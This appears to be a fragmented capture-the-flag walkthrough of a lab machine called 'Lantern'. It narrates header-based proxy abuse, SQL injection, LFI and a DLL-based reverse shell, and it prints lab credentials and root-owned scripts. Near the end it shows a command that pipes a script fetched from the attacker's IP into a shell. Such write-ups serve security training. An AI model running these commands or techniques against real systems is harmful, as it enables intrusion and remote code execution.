Simple website serving some html. Vacancies page seems interesting. Upon uploading a file that ends with .pdf we get Thank you! We will conact you very soon!
Writeup.png
No subdomains or interesting files found on port 80.
The file upload only accepted PDF, I tried uploading malicious payloads but no callback and XSS too didn't work. malicious-pdf
HTTP (3000) [Enum]
Some kind of Admin panel which seems to be using Blazor
Writeup-1.png
Hmmm..
Writeup-2.png
Communication happens on Websockets?
Writeup-3.png
Feroxbuster with common.txt wordlist found /error
Writeup-4.png
In the response headers we get Server: Kestrel too.
HTTP (80)
Skipper Proxy
Port 80 also runs on blazor and the response headers has Server: Skipper Proxy
While searching around for blazor common files I came across the chanan/BlazorStyled/docs/_framework which had interesting files, like jsons. The files were not readable unless we used the X-Skipper-Proxy header:
Writeup-5.png
Writeup-6.png
Internal
Note: Using the proxy key we are able to see all DLLs used by blazor application in Network.
Add the X-Skipper-Proxy key to burp requests and then we are able to see Internal Pages of website
Writeup-9.png
SQLi
Book vacation is vulnerable to SQLi.
Writeup-10.png
Based on Dotnet application I assumed the database was MSSQL, but it's sqlite3?!
Writeup-11.png
110% rabbit hole as database is controlled by Javascript 💀
HTTP (3000) [Admin]
Creds: admin:AJbFA_Q@925p9ap#22
Admin Dashboard
Writeup-7.png
File Upload
If we try to upload any web shell via Upload Content we can't activate it because we get Content-Type: application/octet-stream
Writeup-8.png
Source
In files we can get source of app:
LFI
LFI successful
There's a database somewhere...
I tried getting program cmdline's, but for whatever reason they were empty.. almost all PIDs.......
Components
If we enter incorrect module name we get the path to components:
Writeup-12.png
Craft malicious payload:
I tried changing the path as file was being uploaded, but wasn't able to get it into the components directory. If we reverse the process and point to images directory another error happens.
Writeup-13.png
Most probably no permission to read the file..
It also seems case sensitive.
Writeup-14.png
SHEEEEEEEEEEEEEEEEEEEEEH!! After so much blood and sweat finally managed to get the right DLL type to get reverse shell.
└─$ ssh tomas@10.129.131.78 -i ssh/tomas/id_rsa
tomas@lantern:~$ sudo -l
Matching Defaults entries for tomas on lantern:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User tomas may run the following commands on lantern:
(ALL : ALL) NOPASSWD: /usr/bin/procmon
tomas@lantern:~$ curl 10.10.14.22/lp.sh|sh|tee /dev/shm/lp.log
...
╔══════════╣ Mails (limit 50)
20774 4 -rw-r--r-- 1 tomas mail 539 Jul 31 12:00 /var/mail/tomas
20774 4 -rw-r--r-- 1 tomas mail 539 Jul 31 12:00 /var/spool/mail/tomas
...
tomas@lantern:/var/mail$ cat tomas
From hr@lantern.htb Mon Jan 1 12:00:00 2023
Subject: Welcome to Lantern!
Hi Tomas,
Congratulations on joining the Lantern team as a Linux Engineer! We're thrilled to have you on board.
While we're setting up your new account, feel free to use the access and toolset of our previous team member. Soon, you'll have all the access you need.
Our admin is currently automating processes on the server. Before global testing, could you check out his work in /root/automation.sh? Your insights will be valuable.
Exciting times ahead!
Best.
root@lantern:~# cat cleanup.sh
#!/bin/bash
# Directory to clean up in /opt/components
DIR_COMPONENTS="/opt/components"
# Files to exclude in /opt/components
EXCLUDE_FILES_COMPONENTS=("FileTree.dll" "FileUpload.dll" "HealthCheck.dll" "Logs.dll" "Resumes.dll")
# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_COMPONENTS=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_COMPONENTS[@]}")
EXCLUDE_PATTERN_COMPONENTS=${EXCLUDE_PATTERN_COMPONENTS:1} # Remove leading '|'
# Find and delete files not in the exclude list in /opt/components
/usr/bin/find "$DIR_COMPONENTS" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_COMPONENTS" | while read -r file; do
/bin/rm -f "$file"
done
# Directory to clean up in /var/www/sites/lantern.htb/static/images
DIR_IMAGES="/var/www/sites/lantern.htb/static/images"
# Files to exclude in /var/www/sites/lantern.htb/static/images
EXCLUDE_FILES_IMAGES=("about-1.jpg" "about-2.jpg" "about.jpg" "avatar-1.jpg" "avatar-2.jpg" "avatar.jpg" "bg-bot.jpg" "bg-top.jpg" "blog-1.jpg" "blog-2.jpg" "blog-3.jpg")
# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_IMAGES=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_IMAGES[@]}")
EXCLUDE_PATTERN_IMAGES=${EXCLUDE_PATTERN_IMAGES:1} # Remove leading '|'
# Find and delete files not in the exclude list in /var/www/sites/lantern.htb/static/images
/usr/bin/find "$DIR_IMAGES" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_IMAGES" | while read -r file; do
/bin/rm -f "$file"
done
/usr/sbin/service blazor-server restart
root@lantern:~# file bot.exp
bot.exp: a /usr/bin/expect -f script, ASCII text executable
root@lantern:~# cat bot.exp
#!/usr/bin/expect -f
spawn nano /root/automation.sh
set text "echo Q3Eddtdw3pMB | sudo ./backup.sh"
while {1} {
foreach char [split $text ""] {
send "$char"
sleep 1
}
send "\r"
sleep 0.5
for {set i 0} {$i < [string length $text]} {incr i} {
send "\b \b" ;
}
send "\r"
}
